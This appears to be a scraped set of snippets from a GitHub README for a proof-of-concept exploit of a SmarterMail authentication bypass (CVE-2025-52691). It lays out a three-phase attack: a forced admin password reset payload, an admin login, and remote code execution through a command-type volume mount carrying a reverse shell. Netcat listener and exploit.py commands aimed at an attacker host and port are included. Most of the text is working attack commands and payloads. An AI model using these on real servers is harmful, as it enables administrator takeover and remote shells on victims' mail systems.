### Start Netcat Listener (Bash) Source: https://github.com/ninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001/blob/master/README.md Command to start a netcat listener for checking network connectivity and receiving reverse shells. ```bash nc -lvnp 4444 ``` -------------------------------- ### Automated Exploit Execution Script Source: https://github.com/ninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001/blob/master/README.md A shell script to automate the execution of the SmarterMail exploit. Use the --auto flag for automated setup. ```bash ./run_exploit.sh --auto ``` -------------------------------- ### Troubleshoot Port Blocking (Bash) Source: https://github.com/ninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001/blob/master/README.md Command to allow traffic on a specific port using ufw, addressing 'Connection refused' errors. ```bash sudo ufw allow 9998 ``` -------------------------------- ### Phase 3: RCE via Volume Mounts Source: https://github.com/ninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001/blob/master/README.md Executes arbitrary commands on the target system by creating a malicious volume mount. ```APIDOC ## POST /api/v1/settings/volume-mounts ### Description Creates a volume mount with an embedded command to achieve Remote Code Execution (RCE) on the target system. ### Method POST ### Endpoint /api/v1/settings/volume-mounts ### Parameters #### Request Body - **name** (string) - Required - A name for the volume mount. - **path** (string) - Required - The path on the target system where the volume mount will be created. - **command** (string) - Required - The command to be executed (e.g., a reverse shell). - **enabled** (boolean) - Required - Whether the volume mount should be enabled. - **type** (string) - Required - The type of the volume mount, typically 'command'. ### Request Example ```json { "name": "random_volume_name", "path": "C:\\Temp\\random_volume_name", "command": "powershell reverse shell command", "enabled": true, "type": "command" } ``` ``` -------------------------------- ### Phase 2: Admin Login Source: https://github.com/ninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001/blob/master/README.md Logs in to the SmarterMail system using the newly set administrator credentials. ```APIDOC ## POST /api/v1/auth/login ### Description Authenticates to the SmarterMail system using administrator credentials. ### Method POST ### Endpoint /api/v1/auth/login ### Parameters #### Request Body - **username** (string) - Required - The administrator username. - **password** (string) - Required - The administrator password. ### Request Example ```json { "username": "admin", "password": "NewPassword123!@#" } ``` ``` -------------------------------- ### Run SmarterMail Exploit (Python) Source: https://github.com/ninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001/blob/master/README.md Execute the SmarterMail authentication bypass exploit using Python. Requires target host, port, attacker host, and attacker port. Optional arguments include custom credentials and debug mode. ```bash python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444 ``` ```bash python3 exploit.py \ -H https://mail.company.com \ -P 443 \ -A 10.0.0.1 \ -p 8080 \ --admin-username administrator \ --new-password "ComplexPassword123!@#" ``` ```bash python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444 -d ``` -------------------------------- ### Phase 1: Authentication Bypass - Force Password Reset Source: https://github.com/ninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001/blob/master/README.md This endpoint is used to bypass authentication by forcing a password reset for an administrator account. ```APIDOC ## POST /api/v1/auth/force-reset-password ### Description Bypasses authentication by forcing a password reset for an administrator account. ### Method POST ### Endpoint /api/v1/auth/force-reset-password ### Parameters #### Request Body - **IsSysAdmin** (string) - Required - Indicates if the user is a system administrator. - **OldPassword** (string) - Required - The old password (can be a dummy value). - **Username** (string) - Required - The username of the administrator. - **NewPassword** (string) - Required - The new password to set. - **ConfirmPassword** (string) - Required - Confirmation of the new password. ### Request Example ```json { "IsSysAdmin": "true", "OldPassword": "dummy", "Username": "admin", "NewPassword": "NewPassword123!@#", "ConfirmPassword": "NewPassword123!@#" } ``` ### Response #### Success Response (200) - **success** (boolean) - Indicates if the operation was successful. - **resultCode** (integer) - The result code of the operation. - **debugInfo** (string) - Debugging information related to the operation. #### Response Example ```json { "success": true, "resultCode": 200, "debugInfo": "check1\r\ncheck2\r\ncheck3\r\ncheck4.2\r\ncheck5.2\r\ncheck6.2\r\ncheck7.2\r\ncheck8.2\r\n" } ``` ``` -------------------------------- ### SmarterMail RCE via Volume Mounts Payload (JSON) Source: https://github.com/ninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001/blob/master/README.md The JSON payload used in Phase 3 to achieve Remote Code Execution (RCE) by configuring a volume mount with a command. ```json { "name": "random_volume_name", "path": "C:\\Temp\\random_volume_name", "command": "powershell reverse shell command", "enabled": true, "type": "command" } ``` -------------------------------- ### SmarterMail Admin Login Payload (JSON) Source: https://github.com/ninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001/blob/master/README.md The JSON payload used in Phase 2 to log in as an administrator using the newly set password. ```json { "username": "admin", "password": "NewPassword123!@#" } ``` -------------------------------- ### SmarterMail Authentication Bypass Payload (JSON) Source: https://github.com/ninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001/blob/master/README.md The JSON payload used in Phase 1 to bypass authentication by forcing a password reset for the admin user. ```json { "IsSysAdmin": "true", "OldPassword": "dummy", "Username": "admin", "NewPassword": "NewPassword123!@#", "ConfirmPassword": "NewPassword123!@#" } ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.